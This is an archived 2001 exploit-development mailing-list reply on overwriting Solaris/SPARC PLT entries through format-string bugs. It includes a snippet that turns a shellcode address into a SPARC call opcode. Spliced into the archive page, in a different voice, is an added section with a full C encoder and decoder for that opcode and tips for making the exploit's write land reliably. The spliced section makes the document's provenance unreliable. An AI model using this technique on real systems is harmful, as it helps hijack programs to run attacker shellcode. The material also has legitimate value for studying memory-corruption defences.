Re: Is GOT exploitable in solaris?

From: Juliano Rizzo (core.lists.exploit-dev@core-sdi.com)
Date: Fri Dec 28 2001 - 08:14:30 PST


    > I've never tried what you're attempting to do but if you can
    > exploit the format string multiple times you could overwrite
    > a couple of instructions in the PLT and create a JMPL
    > instruction.
    
    It's possible to overwrite the PLT with a CALL instruction,
    writing only once. I did it on Solaris 2.7/sparc.
    
    The easiest way to exploit a format string is to overwrite any return
    address (paddress) to point to your shellcode, but you can add a few lines
    of code to your exploit and translate the address of your shellcode (value)
    into a SPARC call opcode. In this way you are able to overwrite the PLT.
    
    if (p_plt)
    {
        /* turn the shellcode address (value) into a SPARC call opcode,
           relative to the PLT entry being overwritten (paddress) */
        value = ((value - paddress)/4) + 0x40000000;
        printf ("Sparc Opcode:%x\n", value);
    }
    
    
    --
    ==============[ CORE Security Technologies ]===============
    Juliano Rizzo
    Security Consultant
    juliano.rizzoat_private
    
    Florida 141  |  2º cuerpo  |  7º piso
    (C1005AAC) Buenos Aires  |  Argentina
    Tel/Fax : (54 11) 4878-CORE (2673)
    info.argentinaat_private  |  www.corest.com
    =====================================================
    
    This eMail and any files attached to it are confidential and intended
    solely for the use of the individual or entity to whom they are addressed.
    If you are not the intended recipient or the person responsible for
    delivering to the intended recipient, be advised that you have received
    this email in error and that any use is strictly prohibited. If you have
    received this email in error, please notify Core Security Technologies by
    reply email or dial (54 11) 4878-CORE (2673), and delete the material from
    any computer. Thank you.
    
    --- for a personal reply use: Juliano Rizzo <juliano.rizzoat_private>
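As an added example (not code from the post above, and not Core's exploit), the following C helper performs the shellcode-address-to-call-opcode translation Juliano describes and decodes the result back to verify it. The PLT slot and shellcode addresses it uses are constructed sample values, not addresses taken from Solaris 2.7. It uses unsigned arithmetic and masks the displacement to 30 bits, so the encoding stays correct whether the target lies above or below the overwritten slot, and it rejects misaligned addresses.

```c
/*
 * Added example: encode a SPARC "call" instruction that, when written over
 * a PLT entry at `slot`, transfers control to `target` (the shellcode).
 * Not part of the original post; the sample addresses below are constructed.
 *
 * SPARC call format: bits 31:30 = 01, bits 29:0 = (target - pc) / 4 as a
 * signed 30-bit word displacement, where pc is the address of the call itself.
 */
#include <stdint.h>
#include <stdio.h>

#define SPARC_OP_MASK      0xc0000000u
#define SPARC_CALL_OP      0x40000000u
#define SPARC_DISP30_MASK  0x3fffffffu

/* Return the call opcode to store at `slot`, or 0 if either address is not
 * 4-byte aligned (0 is never a call instruction, so it is a safe sentinel). */
uint32_t sparc_call_opcode(uint32_t slot, uint32_t target)
{
    if ((slot & 3u) || (target & 3u))
        return 0;
    /* Unsigned subtraction wraps mod 2^32, so a backward target yields the
     * two's-complement displacement; masking keeps its low 30 bits. */
    uint32_t disp30 = ((target - slot) >> 2) & SPARC_DISP30_MASK;
    return SPARC_CALL_OP | disp30;
}

/* Decode: given the opcode sitting at `slot`, return the address it calls,
 * or 0 if the word is not a call instruction at all. */
uint32_t sparc_call_target(uint32_t slot, uint32_t opcode)
{
    if ((opcode & SPARC_OP_MASK) != SPARC_CALL_OP)
        return 0;
    uint32_t disp30 = opcode & SPARC_DISP30_MASK;
    /* Sign-extend the 30-bit displacement to 32 bits before scaling by 4. */
    uint32_t delta = (disp30 & 0x20000000u) ? (disp30 | 0xc0000000u) : disp30;
    return slot + (delta << 2);
}

int main(void)
{
    /* Constructed sample: a PLT slot in a low-mapped executable and shellcode
     * on the stack. Illustrative values only, not addresses from the post. */
    uint32_t slot = 0x00010000u, shellcode = 0xffbef000u;
    uint32_t op = sparc_call_opcode(slot, shellcode);
    printf("Sparc Opcode:%08x -> calls %08x\n", op, sparc_call_target(slot, op));
    return 0;
}
```

The round trip through sparc_call_target is the check worth keeping in an exploit: if the decoded address is not the shellcode address, the write will land a branch somewhere else and the target will just crash at the next call through that PLT entry.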
    



    This archive was generated by hypermail 2b30 : Fri Dec 28 2001 - 08:56:33 PST